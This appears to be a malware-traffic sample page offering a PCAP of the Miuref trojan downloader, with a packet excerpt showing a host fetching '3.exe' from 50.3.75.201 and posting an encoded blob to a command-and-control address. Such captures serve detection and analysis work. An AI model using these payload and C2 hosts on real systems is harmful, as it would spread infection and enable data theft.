Miuref Malware Trojan Downloader Dropper 3.exe Traffic Sample PCAP file Download 50.3.75.201 27.98.200.81

Download Attachments

  • 1 pcap 3
    Date added: October 23, 2016 6:11 am Added by: admin File size: 19 KB Downloads: 68

https://www.hybrid-analysis.com/sample/e5e7d4859ca938d7cc3369099b5dc2eddb8b37f5abe53a115adec1d6e4a62d6c?environmentId=100

 

 

2016-10-23 00:38:21.122679 IP 192.168.1.102.58627 > 50.3.75.201.5450: Flags [P.], seq 0:284, ack 1, win 256, length 284
E..Dmk@…Ln…f2.K….J…..|4.P…&…GET /3.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 50.3.75.201:5450
Connection: Keep-Alive


E..(..@….d…f…….P…]d.v P….U……..
2016-10-23 00:38:40.506816 IP 192.168.1.102.58630 > 191.239.213.197.80: Flags [P.], seq 0:285, ack 1, win 258, length 285: HTTP: GET / HTTP/1.1
E..E..@….F…f…….P…]d.v P….l..GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: microsoft.com
Cache-Control: no-cache
Cookie: MC1=GUID=2293236aa535f0419d025fcc74bb7e85&HASH=6a23&LV=201605&V=4&LU=1464392033590; A=I&I=AxUFAAAAAACLBgAAxLrgFeZEPolFxA6C0ICGYA!!&V=4

2016-10-23 00:38:40.609397 IP 192.168.1.102.62604 > 75.75.75.75.53: 49287+ A? www.microsoft.com. (35)
E..?a=………fKKKK…5.+A…………..www    microsoft.com…..

E..(“.@…2….f.b.Q.&.P’….N.yP………….
2016-10-23 00:39:17.207471 IP 192.168.1.102.58662 > 27.98.200.81.80: Flags [P.], seq 0:667, ack 1, win 256, length 667: HTTP: POST / HTTP/1.1
E…”.@…0X…f.b.Q.&.P’….N.yP….*..POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: 27.98.200.81
Content-Length: 456
Cache-Control: no-cache

d2pGjJdtAGNEQeNSiNk5j4C2hejimyjG9eM5aPiE8dC/bG7qb8U+BUiEPKZVREllTpcozUwbBFOPfdocWhx8OM2loX0RRylhVIqSTfyHO2Ap+8hrAVfF11D0RMWMUDtPeTZWUTfyi9mcPjN8tg4kWloFyUiK/je3BNFUWcwz0H+1Ac3qpXU+/Qq2ZEFfRr8SJEmIh6bgnSVsPswcNdc0x9AOFknluNEya87tF++FapRWLCdHcqNc1I0DQuhkvYXW2ihrBwfC/+HrV+nmo4gh9NgPYiFvNzP12OJTli8Yc859MBNep0jKYYtP3AZS82n7y2EHnOKe3vBw4bI3AUzp6h6nAndDxa8EWeUcG1MfN4hLehjCKUdi3VS3XUo0x79CPw1Qys28gKmjxOZNVa6WWxpnat8IzG0oMxYgQjNz6m3mfkcGB7nZ33S4EeYSxVFiCRFyZGw=
2016-10-23 00:39:17.456625 IP 192.168.1.102.58662 > 27.98.200.81.80: Flags [.], ack 170, win 255, length 0

Share

Leave a Reply